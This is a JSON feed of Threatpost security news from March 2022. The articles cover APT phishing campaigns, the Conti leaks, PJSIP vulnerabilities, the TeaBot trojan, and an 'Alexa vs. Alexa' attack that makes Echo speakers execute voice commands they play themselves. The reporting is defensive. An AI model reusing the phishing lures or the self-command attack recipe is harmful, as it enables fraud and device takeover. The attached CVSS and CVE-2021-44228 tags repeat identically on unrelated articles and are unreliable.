", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-09T14:07:55", "type": "threatpost", "title": "Russian APTs Furiously Phish Ukraine \u2013 Google", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-09T14:07:55", "id": "THREATPOST:751A0E2371F134F90F39C20AB70C1E2A", "href": "https://threatpost.com/russian-apts-phishing-ukraine-google/178819/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-18T18:54:13", "description": "An advanced persistent threat (APT) group has been targeting luxury hotels in Macao, China with a spear-phishing campaign aimed at breaching their networks and stealing the sensitive data of high-profile guests staying at resorts, including the Grand Coloane Resort and Wynn Palace.\n\nA threat 
research report from Trellix \u201ccautiously\u201d identified the South Korean [DarkHotel APT group](<https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/suspected-darkhotel-apt-activity-update.html>) as the culprit behind the attacks.\n\nThe researchers said the spear-phishing campaign began at the tail end of November, with emails loaded with malicious Excel macros being sent to ranking hotel management with access to hotel networks, including human resources and office managers.\n\nIn one attack wave, phishing emails were sent to 17 different hotels on Dec. 7 and faked to look like they were sent from the Macao Government Tourism Office, to gather information about who was staying at the hotels. The emails asked the recipient to open an attached Excel file labeled \u201cpassenger inquiry.\u201d\n\n\u201cPlease open the attached file with enable content and specify whether the people were staying at the hotel or not?\u201d the malicious email read, according to the threat researchers with Trellix. The communication was signed from the \u201cInspection Division \u2013 MGTO.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/18144945/darkhotel-attack-flow-chart.png>)\n\nThe DarkHotel attack flow. Source: Trellix.\n\nTrellix was able to attribute the attacks to DarkHotel with a \u201cmoderate\u201d level of confidence due to the IP address for the command-and-control server (C2), which was previously attached to the group; the targeting of hotels, which DarkHotel is already infamous for; and patterns found in the C2 setup which match known DarkHotel activities, the report said.\n\n\u201cHowever, we have lowered our confidence level to moderate because the specific IP address remained active for quite some time even after being publicly exposed, and the same IP address is the origin of other malicious content not related to this specific threat,\u201d the Trellix team said. 
\u201cThese two observations have made us more cautious in our attribution.\u201d\n\n## **DarkHotel Suspected of Stealing Data for Future Attacks**\n\nOnce opened, the macros contacted the C2 server to begin data exfiltration from the hotel networks, the Trellix team explained.\n\n\u201cThe command-and-control server, hxxps://fsm-gov(.)com, used to spread this campaign was trying to impersonate a legitimate government website domain for the Federated States of Micronesia,\u201d Trellix\u2019s report added. \u201cHowever, the real Micronesia website domain is \u2018fsmgov.org.\u2019\u201d\n\nThe Trellix team said they suspected the attackers were collecting data to be used later.\n\n\u201cAfter researching the event agenda for the targeted hotels, we did indeed find multiple conferences that would have been of interest to the threat actor,\u201d the Trellix researchers reported. \u201cFor instance, one hotel was hosting an International Environment Forum and an International Trade & Investment Fair, both of which would attract potential espionage targets.\u201d\n\nThe spear-phishing campaign stopped on Jan. 18, the team said.\n\n## **COVID-19 Stalls Campaign**\n\nThat said, the COVID-19 pandemic cancelled or delayed these events, giving law enforcement time to catch on. By Dec. 2021, the Macao Security Force Bureau received a notification from the Cyber Security Incident Alert and Emergency Response Center of the police department that a domain similar to the official Security Force page was being used to spread malware and \u201ccommit illegal acts.\u201d\n\nBesides targeting hotels, other campaigns attributed to the same C2 IP address, believed to be controlled by DarkHotel, included going after MetaMask crypto users with a spoofed Collab.Land phishing page, the Trellix report added.\n\nDarkHotel has a long history of targeting Chinese victims. 
In April 2020, the APT group went after Chinese virtual private network (VPN) service provider SangFor, used by several Chinese government agencies. By the end of the first week of that month, at least 200 endpoints had been compromised, according to reports.\n\nAround the same time, at the start of the COVID-19 pandemic, [DarkHotel targeted the systems of the World Health Organization](<https://threatpost.com/who-attacked-possible-apt-covid-19-cyberattacks-double/154083/>).\n\nAttacks like these show how attractive data stored in hotel networks can be for threat actors. Hotel operators should recognize that cybersecurity needs to reach beyond their networks\u2019 edge, the Trellix team advised. Travelers likewise need to take appropriate security precautions, Trellix added.\n\n\u201cOnly bring the essential devices with limited data, keep security systems up to date and make use of a VPN service when using hotel Wi-Fi,\u201d the report said.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-18T18:53:40", "type": "threatpost", "title": "DarkHotel APT Targets Wynn, Macao Hotels to Rip Off Guest Data", "bulletinFamily": "info", "cvss2": 
{"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-18T18:53:40", "id": "THREATPOST:B3A92C43D5FF3C53BE8EF06C687B80B6", "href": "https://threatpost.com/darkhotel-apt-wynn-macao-hotels/178989/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-03T17:21:25", "description": "Cyberattackers used a compromised Ukrainian military email address to phish EU government employees who\u2019ve been involved in managing the logistics of refugees fleeing Ukraine, according to a new [report](<https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails>).\n\nUkraine has been at the center of an unprecedented wave of cyberattacks in recent weeks and months, from distributed denial-of-service (DDoS) [campaigns](<https://threatpost.com/ukrainian-ddos-attacks-should-put-us-on-notice-researchers/178498/>) against organizations and citizens to attacks against national [infrastructure](<https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/>) and more. This time, attackers went after aides in the EU, leveraging breaking news in the Russian invasion of Ukraine to entice targets into opening emails containing Microsoft Excel files laced with malware.\n\nResearchers attributed the phishing attempt to TA445 (aka UNC1151 or Ghostwriter). 
TA445 has previously been [linked](<https://www.mandiant.com/resources/unc1151-linked-to-belarus-government>) with the government of Belarus.\n\n## Attack Coincided with Russia\u2019s Invasion\n\nOn Wednesday, Feb. 23, NATO convened an [emergency meeting](<https://www.nato.int/cps/en/natohq/news_192406.htm>) regarding the impending Russian invasion of Ukraine.\n\nThe following day \u2013 the day Russia invaded Ukraine \u2013 researchers detected a suspicious email making the rounds. Its subject: \u201cIN ACCORDANCE WITH THE DECISION OF THE EMERGENCY MEETING OF THE SECURITY COUNCIL OF UKRAINE DATED 24.02.2022.\u201d It contained a macros-enabled Microsoft Excel (.xls) spreadsheet titled \u201clist of persons.xlsx\u201d that, when opened, delivered malware called SunSeed.\n\nThe email originated from a ukr.net address, which is a Ukrainian military email address. Oddly enough, the researchers were able to trace the address to a publicly available procurement document for a Stihl-brand lawn mower, purchased back in 2016. The order was made by \u201c\u0412\u0456\u0439\u0441\u044c\u043a\u043e\u0432\u0430 \u0447\u0430\u0441\u0442\u0438\u043d\u0430 \u04102622,\u201d a military unit based in Chernihiv, Ukraine. Exactly how the attackers obtained access to a military email address is not clear.\n\nThis phishing targeted a very specific group of European government personnel involved in managing the outflux of refugees from Ukraine. 
Though the targets \u201cpossessed a range of expertise and professional responsibilities,\u201d the report noted, \u201cthere was a clear preference for targeting individuals with responsibilities related to transportation, financial and budget allocation, administration, and population movement within Europe.\u201d\n\nThe goal in targeting these specific individuals was \u201cto gain intelligence regarding the logistics surrounding the movement of funds, supplies, and people within NATO member countries,\u201d according to the report.\n\n## Attackers Tied to Belarus, Russia by Extension\n\nThe report noted that no \u201cconcrete\u201d evidence can \u201cdefinitively\u201d tie this campaign to a particular threat actor. Still, the researchers noted a bevy of similarities between this phishing campaign and another campaign from July of last year that targeted U.S. cybersecurity and defense companies.\n\nThe July campaign \u201cutilized a highly similar macro-laden XLS attachment to deliver MSI packages that install a Lua malware script,\u201d according to Proofpoint researchers. Lua is the programming language in which SunSeed is coded. \u201cSimilarly, the campaign utilized a very recent government report as the basis of the social engineering content,\u201d they added.\n\nThe file name in that campaign \u2013 \u201clist of participants of the briefing.xls.\u201d \u2013 bears striking resemblance to the one used in this new campaign. Furthermore, \u201cthe Lua script created a nearly identical URI beacon to the SunSeed sample, which was composed of the infected victim\u2019s C Drive partition serial number. Analysis of the cryptography calls in both samples revealed that the same version of WiX 3.11.0.1528 had been utilized to create the MSI packages.\u201d\n\nThese overlaps allowed the researchers to conclude with moderate confidence that the two campaigns were perpetrated by the same threat actor: TA445. 
[According](<https://www.mandiant.com/resources/unc1151-linked-to-belarus-government>) to Mandiant, the group is based in Minsk, connected to the Belarusian military, and conducts its business in the interests of the Belarusian government. Belarus is a close ally of Russia.\n\nThe researchers concluded with a disclaimer. On balancing \u201cresponsible reporting with the quickest possible disclosure of actionable intelligence,\u201d they wrote, \u201cthe onset of hybrid conflict, including within the cyber domain, has accelerated the pace of operations and reduced the amount of time that defenders have to answer deeper questions around attribution and historical correlation to known nation-state operators.\u201d\n\n## Ukraine\u2019s Unprecedented Cyber Targeting\n\nThis phishing campaign isn\u2019t the worst Ukraine-oriented cyberattack in recent weeks, or even recent days. Still, the researchers noted that \u201cwhile the utilized techniques in this campaign are not groundbreaking individually, if deployed collectively, and during a high tempo conflict, they possess the capability to be quite effective.\u201d\n\nThomas Stoesser, of comforte AG, told Threatpost via email that this attack \u201cshows just how ruthless and clever threat actors can be in adapting existing social engineering tactics.\u201d\n\n\u201cThe situation underscores two key points that every enterprise should heed,\u201d he added. \u201cOne, it\u2019s not enough simply to educate employees sporadically about common social engineering tactics. [Companies] need to put a premium on employees treating every email with healthy skepticism. Two, protect all sensitive enterprise data with more than just perimeter security, even if you feel that the impenetrable vault you\u2019ve stored it all in is foolproof.\u201d\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. 
Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-03T17:18:44", "type": "threatpost", "title": "Phishing Campaign Targeted Those Aiding Ukraine Refugees", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-03T17:18:44", "id": "THREATPOST:5531DA413E023731C17E5B0771A25B3D", "href": "https://threatpost.com/phishing-campaign-targeted-those-aiding-ukraine-refugees/178752/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-16T19:32:09", "description": "Thanks to gray-hat Ukrainian hacker ContiLeaks, the Conti ransomware gang [spilled its guts](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>) in late February. 
Since then, researchers have been poring over the group\u2019s secrets, including a massive trove of chat logs and other doxxed data, including [source code](<https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/>) for Conti ransomware, TrickBot[ malware](<https://threatpost.com/trickbot-break-researchers-scratching-heads/178678/>), a decryptor and the gang\u2019s administrative panels.\n\nContiLeaks published these internal documents after the ransomware group\u2019s leaders posted an aggressively pro-Russian message on their official site in the aftermath of Russia\u2019s invasion of Ukraine.\n\nLast week, BreachQuest published the [findings](<https://www.breachquest.com/conti-leaks-insight-into-a-ransomware-unicorn/>) of its week-long deep dive into the data. In essence, BreachQuest found that Conti Group operates like a legitimate, above-board high-tech company that hires and even fires contractors and salaried employees alike.\n\nThe dump enabled researchers to sketch out a chart showing key figureheads and the roles they play to grow Conti\u2019s enterprise, plus details on:\n\n * Earnings and costs;\n * How they recruit;\n * Who are the leaders;\n * Who they target: small as well as big targets;\n * How they target and escalate attacks and how they receive payments;\n * How they find their victims;\n * Project Blockchain \u2013 Conti group\u2019s effort to create its own altcoin; and\n * A more thorough understanding of the tools used to spy on and compromise victims.\n\nMarco Figueroa, head of product at BreachQuest, dropped in on the Threatpost podcast to give us some of the intelligence gleaned from the leaked chat logs. Those logs show that over the course of 13 months, Conti spent about $6M on salary, monthly bonuses, tooling and services.\n\n\n\n(Brought to you by SpecOps. 
Underwriters of Threatpost podcasts do not assert any editorial control over content.)\n\nIts HR team is indicative of how professionally Conti group conducts business: They offer \u201cemployee of the month\u201d and performance review programs, for example.\n\nIn short, Conti group considers itself a legitimate company. Many of its employees don\u2019t even know they\u2019re working for a cybercriminal outfit. Some probably choose to look the other way, but the turnover is still high: When they figure it out, they tend to vamoose.\n\nThat\u2019s probably one reason why Conti\u2019s training materials are the best Marco\u2019s ever seen: The group needs to document procedures because they constantly have to train new contractors.\n\nIn fact, security teams themselves should take the training, Marco says, to find out how the ransomware outfit successfully trains its regrettably top-notch cyberattackers.\n\nBy the way, after BreachQuest\u2019s report was published, Marco got a phone call from Russia: a first for him, he said. Either Conti\u2019s a fan of BreachQuest\u2019s research, it was a wrong number, or hey, who knows? Maybe its HR team is expanding its outreach.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/14174903/Russia_calling_Marco-e1647294557940.jpg>)\n\nMarco got a call from Russia. He didn\u2019t answer. Source: Threatpost screen capture.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/031122_Marco_Figueroa_BreachQuest_mixdown.mp3>). For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>).\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-14T21:50:45", "type": "threatpost", "title": "Staff Think Conti Group Is a Legit Employer \u2013 Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-14T21:50:45", "id": "THREATPOST:BA0FA5036C385C822C787514850A67E5", "href": "https://threatpost.com/staff-think-conti-group-legit-employer-podcast/178903/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-01T21:49:53", "description": "[WhatsApp](<https://threatpost.com/facebooks-mandatory-data-sharing-whatsapp-ire/162828/>) and [BlueJeans](<https://www.bluejeans.com/>) are just two of the world\u2019s most 
popular communication apps that are using an open-source library riddled with newfound security holes.\n\nOne thing this open-source, flawed library shares with the Apache Log4J logging library [fiasco](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) that started in December: It\u2019s ubiquitous.\n\nThe library, [PJSIP](<https://github.com/pjsip/pjproject>) \u2013 an open-source multimedia communication library \u2013 is also used by[ Asterisk](<https://www.asterisk.org/>). Asterisk is an enterprise-class, open-source PBX (private branch exchange) [toolkit](<https://threatpost.com/voip-espionage-campaign-utilities-supplier/148916/>) that\u2019s used in voice-over-IP (VoIP) services in a massive number of implementations.\n\nAccording to the Asterisk site, the software is downloaded 2M times annually and runs on 1M servers in 170 countries. Asterisk powers IP PBX systems, VoIP gateways and conference servers, and it\u2019s used by SMBs, enterprises, call centers, carriers and governments.\n\nOn Monday, devops platform provider JFrog Security [disclosed](<https://jfrog.com/blog/jfrog-discloses-5-memory-corruption-vulnerabilities-in-pjsip-a-popular-multimedia-library/>) five memory-corruption vulnerabilities in PJSIP, which supplies an API that can be used by [IP telephony applications](<https://trac.pjsip.org/repos/wiki/Projects_Using_PJSIP>) such as voice-over-IP (VoIP) phones and conference apps.\n\nAn attacker who successfully triggers the vulnerabilities can flip the switch on remote code execution (RCE) in an application that uses the PJSIP library, JFrog researchers explained.\n\nFollowing JFrog\u2019s disclosure, PJSIP\u2019s maintainers have fixed the five CVEs, depicted below.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/01155749/PJSIP-security-vulnerabilities-e1646168517426.png>)\n\nThe disclosed PJSIP security vulnerabilities. 
Source: JFrog Security.\n\n## What Went Wrong\n\nIn its technical breakdown, JFrog researchers explained that the PJSIP framework offers a library named PJSUA that supplies an API for SIP applications.\n\n\u201cThe basic PJSUA APIs are also wrapped by object-oriented APIs. PJSUA offers a rich Media Manipulation API, where we have spotted the [five] vulnerabilities,\u201d they said.\n\nThree of the flaws are stack overflow vulnerabilities that can lead to RCE and which are rated 8.1 on the CVSS severity-rating scale.\n\nThe remaining two include a read out-of-bounds vulnerability and a buffer overflow weakness in the PJSUA API, both of which can lead to denial-of-service (DoS) and both of which are rated at CVSS 5.9.\n\n## Vulnerable Projects\n\nJFrog said that projects that use the PJSIP library before version 2.12 and which pass attacker-controlled arguments to any of the following APIs are vulnerable:\n\n * pjsua_player_create \u2013 filename argument must be attacker-controlled\n * pjsua_recorder_create \u2013 filename argument must be attacker-controlled\n * pjsua_playlist_create \u2013 file_names argument must be (partially) attacker-controlled\n * pjsua_call_dump \u2013 buffer argument capacity must be smaller than 128 bytes\n\nJFrog recommended upgrading PJSIP to version 2.12 to address the vulnerabilities.\n\n## Not the First Time\n\nPockmarks in PJSIP and other common videoconferencing architecture implementations are nothing new. 
In August 2018, Google Project Zero researcher Natalie Silvanovich [disclosed](<https://googleprojectzero.blogspot.com/2018/12/adventures-in-video-conferencing-part-1.html>) critical vulnerabilities in most of the common ones, including WebRTC (used by Chrome, Safari, Firefox, Facebook Messenger, Signal and others), PJSIP (which, again, is used by WhatsApp, BlueJeans and millions of implementations of Asterisk) and Apple\u2019s proprietary library for FaceTime.\n\n\u201cIf exploited, such vulnerabilities would have let attackers crash apps using the implementation, by merely placing a video call,\u201d noted Ronen Slavin, then head of research at Reason Cybersecurity and currently the co-founder and CTO at the source code control, detection, and response platform Cycode, back in 2019. \u201cThis would have then triggered a memory heap overflow which could allow the attacker to take over the victim\u2019s video calling account.\u201d\n\nApps such as Skype, Google Hangouts and WhatsApp \u201chave made it easy to have meaningful face-to-face interactions across between two points anywhere on the globe,\u201d he [wrote](<https://www.infosecurity-magazine.com/opinions/hacking-video-conferencing/>).\n\nIt was true then. Since then, the pandemic has poured gas on the fire when it comes to virtual connections: all the more reason to heed JFrog\u2019s advice and patch ASAP.\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-01T21:44:32", "type": "threatpost", "title": "RCE Bugs in WhatsApp, Other Hugely Popular VoIP Apps: Patch Now!", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-01T21:44:32", "id": "THREATPOST:C9FBCC2A1C52CDB54C6AAB18987100F4", "href": "https://threatpost.com/rce-bugs-whatsapp-popular-voip-apps-patch-now/178719/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-08T18:32:41", "description": "UPDATE\n\nResearchers from the University of London and the University of Catania have discovered how to weaponize Amazon Echo devices to hack themselves.\n\nThe attack \u2013 
dubbed \u201cAlexa vs. Alexa\u201d \u2013 leverages what the researchers called \u201ca command self-issue vulnerability\u201d: pre-recorded messages which, when played over a 3rd- or 4th-generation Echo speaker, cause the speaker to perform actions on itself.\n\n## How to Make Alexa Hack Itself\n\nSmart speakers lie dormant during the day, waiting for a user to vocalize a particular activation phrase: i.e., \u201cHey, Google,\u201d \u201cHey, Cortana\u201d or, for the Amazon Echo, \u201cAlexa,\u201d or simply, \u201cEcho.\u201d Usually, of course, it\u2019s the device\u2019s owner who issues such commands.\n\nHowever, researchers found that \u201cself-activation of the Echo device [also] happens when an audio file reproduced by the device itself contains a voice command.\u201d And even if the device asks for a secondary confirmation, in order to perform a particular action, \u201cthe adversary only has to always append a \u2018yes\u2019 approximately six seconds after the request to be sure that the command will be successful.\u201d\n\nTo get the device to play a maliciously crafted recording, an attacker would need a smartphone or laptop in Bluetooth-pairing range. Unlike internet-based attacks, this scenario requires proximity to the target device. This physical impediment is balanced by the fact that, as the researchers noted, \u201conce paired, the Bluetooth device can connect and disconnect from Echo without any need to perform the pairing process again. Therefore, the actual attack may happen several days after the pairing.\u201d\n\nAlternatively, the report stated, attackers could use an internet radio station, beaming to the target Echo like a command-and-control server. 
This method \u201cworks remotely and can be used to control multiple devices at once,\u201d but would require extra steps, including tricking the targeted user into downloading a malicious [Alexa \u201cskill\u201d](<https://threatpost.com/researchers-hacked-amazons-alexa-to-spy-on-users-again/131401/>) (app) to an Amazon device.\n\nUsing the Alexa vs. Alexa attack, attackers could tamper with applications downloaded to the device, make phone calls, place orders on Amazon, eavesdrop on users, control other connected appliances in a user\u2019s home and more.\n\n\u201cThis action can undermine physical safety of the user,\u201d the report stated, \u201cfor example, when turning off the lights during the evening or at nighttime, turning on a smart microwave oven, setting the heating at a very high temperature or even unlocking the smart lock for the front door.\u201d\n\nIn testing their attack, the authors were able to remotely turn off the lights in one of their own homes 93 percent of the time.\n\n## Smart Speakers Are Uniquely Vulnerable\n\nBecause they\u2019re always listening for their wake word, and because they\u2019re so often interconnected with other devices, smart speakers are prone to unique security vulnerabilities. The Echo series of devices, in particular, has been linked with a series of privacy risks, from microphones \u201c[hearing](<https://threatpost.com/hey-alexa-who-messaging/162587/>)\u201d what people text on nearby smartphones to audio recordings being stored [indefinitely](<https://threatpost.com/amazon-admits-alexa-voice-recordings-saved-indefinitely/146225/>) on company servers.\n\nThe physical proximity required for Bluetooth, or having to trick users into downloading malicious skills, limits but does not eliminate the potential for harm in such a scenario as the Alexa vs. Alexa report described, according to John Bambenek, principal threat hunter at Netenrich. 
Those living in dense cities are potentially at risk, and individuals \u201cat most risk are those in domestic violence scenarios,\u201d he wrote, via email. For that reason, \u201csimply accepting the risk isn\u2019t acceptable.\u201d\n\nThe research prompted Amazon to patch the command self-issue vulnerability, which is the benefit of having a robust threat-hunting culture.\n\n\u201cMost people aren\u2019t evil,\u201d wrote Bambenek. \u201cIt is hard to test new technology against criminal intent because even testers lack the criminal mindset (and that\u2019s a good thing for society). As technology gets adopted, we find things we overlook and make it better.\u201d\n\nFor its part, Amazon gave Threatpost the following statement:\n\n_\u201cAt Amazon, privacy and security are foundational to how we design and deliver every device, feature, and experience. We appreciate the work of independent security researchers who help bring potential issues to our attention, and are committed to working with them to secure our devices. We fixed the remote self-wake issue with Alexa Skills caused by extended periods of silence resulting from break tags as demonstrated by the researchers. We also have systems in place to continually monitor live skills for potentially malicious behavior, including silent re-prompts. Any offending skills we identify are blocked during certification or quickly deactivated, and we are constantly improving these mechanisms to further protect our customers.\u201d_\n\nThe latest, patched version of Alexa device software can be found [here](<https://www.amazon.com/gp/help/customer/display.html?nodeId=GMB5FVUB6REAVTXY&linkCode=sl2&tag=hothard-20&linkId=070200dafa741d26cbd19cf21d735449&language=en_US&ref_=as_li_ss_tl>).\n\n_This posting was updated on March 8 at 1:30 p.m. ET to include Amazon\u2019s statement._\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-07T21:30:12", "type": "threatpost", "title": "Novel Attack Turns Amazon Devices Against Themselves", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-07T21:30:12", "id": "THREATPOST:2707644CA0FB49ADD0ECA1B9AFDA0E8A", "href": "https://threatpost.com/attack-amazon-devices-against-themselves/178797/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-02T22:50:57", "description": "The TeaBot banking trojan \u2013 also known as \u201cAnatsa\u201d \u2013 has been spotted on the Google Play store, researchers from Cleafy have 
[discovered](<https://www.cleafy.com/cleafy-labs/teabot-is-now-spreading-across-the-globe>).

The malware – designed to intercept SMS messages and login credentials from unwitting users – affected users of “more than 400 banking and financial apps, including those from Russia, China, and the U.S.,” its report claims.

This isn’t the first time TeaBot has terrorized Android users.

## TeaBot Just Won’t Die

TeaBot was first [discovered](<https://threatpost.com/threat-actors-androids-flubot-teabot-campaigns/177991/>) last year. It’s a relatively straightforward malware designed to siphon banking, contact, SMS and other types of private data from infected devices. What makes it unique – what gives it such staying power – is the clever means by which it spreads.

TeaBot requires no malicious email or text message, no fraudulent website or third-party service. Instead, it typically comes packaged in a dropper application. Droppers are programs that seem legitimate from the outside, but in fact act as vehicles to deliver a second-stage malicious payload.

TeaBot droppers have masked themselves as ordinary QR code or PDF readers. Hank Schless, senior manager of security solutions at Lookout, explained via email that attackers “usually stick to utility apps like QR code scanners, flashlights, photo filters, or PDF scanners because these are apps that people download out of necessity and likely won’t put as much time into looking at reviews that might impact their decision to download.”

